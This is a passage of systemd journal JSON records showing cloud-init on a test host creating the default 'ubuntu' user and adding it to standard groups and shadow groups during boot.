"SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "MESSAGE" : "new group: name=ubuntu, GID=1000", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817293679" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=273;b=e2b08827b5804427b422c10c84f1567e;m=29057f0;t=5bd16df53d757;x=b57edda67a1f8a7b", "__REALTIME_TIMESTAMP" : "1615280817297239", "__MONOTONIC_TIMESTAMP" : "43014128", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "new user: name=ubuntu, UID=1000, GID=1000, home=/home/ubuntu, shell=/bin/bash", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817297230" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=274;b=e2b08827b5804427b422c10c84f1567e;m=2908494;t=5bd16df5403fb;x=42b5819e6566f300", "__REALTIME_TIMESTAMP" : "1615280817308667", "__MONOTONIC_TIMESTAMP" : "43025556", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308652" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=275;b=e2b08827b5804427b422c10c84f1567e;m=2908559;t=5bd16df5404c1;x=9fd82976f351aa69", "__REALTIME_TIMESTAMP" : "1615280817308865", "__MONOTONIC_TIMESTAMP" : "43025753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=276;b=e2b08827b5804427b422c10c84f1567e;m=29085fd;t=5bd16df540565;x=eb66e0fb53002cec", "__REALTIME_TIMESTAMP" : "1615280817309029", "__MONOTONIC_TIMESTAMP" : "43025917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=277;b=e2b08827b5804427b422c10c84f1567e;m=2908694;t=5bd16df5405fb;x=64c01cd95089e67f", "__REALTIME_TIMESTAMP" : "1615280817309179", "__MONOTONIC_TIMESTAMP" : "43026068", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=278;b=e2b08827b5804427b422c10c84f1567e;m=2908715;t=5bd16df54067d;x=63b1f647f6212e20", "__REALTIME_TIMESTAMP" : "1615280817309309", "__MONOTONIC_TIMESTAMP" : "43026197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309302" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=279;b=e2b08827b5804427b422c10c84f1567e;m=2908797;t=5bd16df5406ff;x=f6a00f782b9ab0be", "__REALTIME_TIMESTAMP" : "1615280817309439", "__MONOTONIC_TIMESTAMP" : "43026327", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309432" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27a;b=e2b08827b5804427b422c10c84f1567e;m=2908835;t=5bd16df54079d;x=5ac4c98ae56706a4", "__REALTIME_TIMESTAMP" : "1615280817309597", "__MONOTONIC_TIMESTAMP" : "43026485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309589" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27b;b=e2b08827b5804427b422c10c84f1567e;m=29088c1;t=5bd16df540828;x=3791b49dc7fdc319", "__REALTIME_TIMESTAMP" : "1615280817309736", "__MONOTONIC_TIMESTAMP" : "43026625", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27c;b=e2b08827b5804427b422c10c84f1567e;m=2908946;t=5bd16df5408ad;x=f662af4b76fbe91a", "__REALTIME_TIMESTAMP" : "1615280817309869", "__MONOTONIC_TIMESTAMP" : "43026758", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309862" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27d;b=e2b08827b5804427b422c10c84f1567e;m=29089cc;t=5bd16df540934;x=1f3068894cde168a", "__REALTIME_TIMESTAMP" : "1615280817310004", "__MONOTONIC_TIMESTAMP" : "43026892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309997" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27e;b=e2b08827b5804427b422c10c84f1567e;m=2908a4c;t=5bd16df5409b4;x=4f2b7d9150228540", "__REALTIME_TIMESTAMP" : "1615280817310132", "__MONOTONIC_TIMESTAMP" : "43027020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310125" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27f;b=e2b08827b5804427b422c10c84f1567e;m=2908ae3;t=5bd16df540a4a;x=6ccc14c1c1ab2dd3", "__REALTIME_TIMESTAMP" : "1615280817310282", "__MONOTONIC_TIMESTAMP" : "43027171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310275" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=280;b=e2b08827b5804427b422c10c84f1567e;m=2908b84;t=5bd16df540aec;x=751261d8bc9cc011", "__REALTIME_TIMESTAMP" : "1615280817310444", "__MONOTONIC_TIMESTAMP" : "43027332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310435" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=281;b=e2b08827b5804427b422c10c84f1567e;m=2908c12;t=5bd16df540b79;x=cc3b0e05082a5fcc", "__REALTIME_TIMESTAMP" : "1615280817310585", "__MONOTONIC_TIMESTAMP" : "43027474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310578" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=282;b=e2b08827b5804427b422c10c84f1567e;m=2908c94;t=5bd16df540bfb;x=785dfbc3f11eaeb2", "__REALTIME_TIMESTAMP" : "1615280817310715", "__MONOTONIC_TIMESTAMP" : "43027604", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310709" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=283;b=e2b08827b5804427b422c10c84f1567e;m=2908d1a;t=5bd16df540c81;x=e008fd5bb62252ab", "__REALTIME_TIMESTAMP" : "1615280817310849", "__MONOTONIC_TIMESTAMP" : "43027738", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310842" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=284;b=e2b08827b5804427b422c10c84f1567e;m=2908d9e;t=5bd16df540d05;x=e89d6773cff887e1", "__REALTIME_TIMESTAMP" : "1615280817310981", "__MONOTONIC_TIMESTAMP" : "43027870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310974" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=285;b=e2b08827b5804427b422c10c84f1567e;m=2908e20;t=5bd16df540d87;x=18af57c4ba9c414f", "__REALTIME_TIMESTAMP" : "1615280817311111", "__MONOTONIC_TIMESTAMP" : "43028000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311105" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=286;b=e2b08827b5804427b422c10c84f1567e;m=2908ef8;t=5bd16df540e60;x=efc5bf646a38b30a", "__REALTIME_TIMESTAMP" : "1615280817311328", "__MONOTONIC_TIMESTAMP" : "43028216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311319" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=287;b=e2b08827b5804427b422c10c84f1567e;m=2908f88;t=5bd16df540eef;x=3d2956e132d9a7aa", "__REALTIME_TIMESTAMP" : "1615280817311471", "__MONOTONIC_TIMESTAMP" : "43028360", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=288;b=e2b08827b5804427b422c10c84f1567e;m=2909019;t=5bd16df540f80;x=6db6906e2b974e45", "__REALTIME_TIMESTAMP" : "1615280817311616", "__MONOTONIC_TIMESTAMP" : "43028505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : 